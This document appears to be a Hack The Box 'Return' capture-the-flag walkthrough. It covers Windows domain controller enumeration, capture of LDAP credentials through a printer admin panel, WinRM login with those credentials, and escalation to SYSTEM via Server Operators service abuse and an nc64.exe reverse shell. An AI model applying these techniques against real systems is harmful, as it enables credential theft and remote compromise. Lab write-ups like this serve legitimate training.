┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.108
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-18 01:00:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10|Vista|11|2012|2022|Longhorn|7|8.1|XP (93%)
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows Server 2019 (93%), Microsoft Windows 10 2004 (90%), Microsoft Windows Vista SP1 (90%), Microsoft Windows 10 1709 - 1803 (89%), Microsoft Windows 10 1709 - 1909 (89%), Microsoft Windows 10 1809 - 2004 (89%), Microsoft Windows 11 21H2 (89%), Microsoft Windows 10 1703 (89%), Microsoft Windows Server 2012 (89%), Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-18T01:01:13
|_ start_date: N/A
|_clock-skew: 18m34s
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.108
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open ldap
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Enumeration: SMB Port 139/445/tcp
crackmapexec shows that the hostname os PRINTER.return.local, and I need auth to get any additional information from SMB:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.108
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.108 -U ""
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.108
================================( Getting domain SID for 10.10.11.108 )================================
Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439
[+] Host is part of a domain (not a workgroup)
BURP:
Everything points to this site being written in PHP, including the page extensions and the response headers:
http://10.10.11.108
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.4.13
Date: Thu, 18 Jan 2024 03:05:37 GMT
Connection: close
Content-Length: 28274
WIRESHARK:
intercept and review packets
DIR BRUTE:
I’ll run feroxbuster against the site, and include -x php since I know the site is PHP as well as a lowercase wordlist since IIS is case-insensitive:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.108
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.4.13.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
Shell as svc-printer
LDAP Credentials:
My first thought on seeing the settings.php page is that it’s populating the “Password” field for me. This could be a case where the actual password is being populated into this field, and it’s just being displayed as *. But looking in Firefox dev tools, it’s actually pre-filling that field with all *, not the password
Request:
When I submit this form, it sends a POST to /settings.php. The POST body only has one argument:
The other three fields in the form are not even sent. If the page does anything with this input, the user can only change the host (or “ip”), and not the port, username, or password.
Watch Request:
I’ll change the hostname to my tun0 IP, and start nc listening on port 389. I’ll also start Wireshark. On clicking “Update”, there’s a connection at nc:
┌──(kali💀kali)-[~]
└─$ nc -lnvp 389
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 59885
0*`%return\svc-printer
1edFg43012!!
It’s probably clear from just that what the username and password that it’s trying to authenticate, but Wireshark breaks it out more nicely:
svc-printer
1edFg43012!!
It’s an LDAP bindRequest, with the username return\svc-printer and the simple authentication (password) of “1edFg43012!!”.
WinRM:
The obvious next step is to look at LDAP, but before that, I’ll check and see if these creds happen to give more direct access. They work for SMB:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
b0818d1--------------------------
Shell as SYSTEM
Enumeration:
This account has a few interesting privileges:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
There’s a bunch of stuff here that could lead to SYSTEM access. I’ve shown using SeBackupPrivilege to get arbitrary file read. SeMachineAccountPrivilege allows me to add a machine to the domain, and I could likely escalate there as well.
Groups:
This user is also in several groups:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
There may be others of interest, but Server Operators jumps out immediately. This group can do a lot of things:
A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Default User Rights: Allow log on locally: SeInteractiveLogonRight Back up files and directories: SeBackupPrivilege Change the system time: SeSystemTimePrivilege Change the time zone: SeTimeZonePrivilege Force shutdown from a remote system: SeRemoteShutdownPrivilege Restore files and directories SeRestorePrivilege Shut down the system: SeShutdownPrivilege
Reverse Shell:
This user can modify, start, and stop services, so I’ll abuse this by having it run nc64.exe to give a reverse shell. Cube0x0 has a nice post that includes many privesc techniques, including this one.
Typically, I would want to get a list of services that this account can modify, but it seems this user doesn’t have access to the Service Control Manager:
It works! I’ll try to stop the service, but it’s not started. Then I’ll start it:
*Evil-WinRM* PS C:\Users\svc-printer\Downloads> sc.exe stop VSS
[SC] ControlService FAILED 1062:
The service has not been started.
┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.108] 53764
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
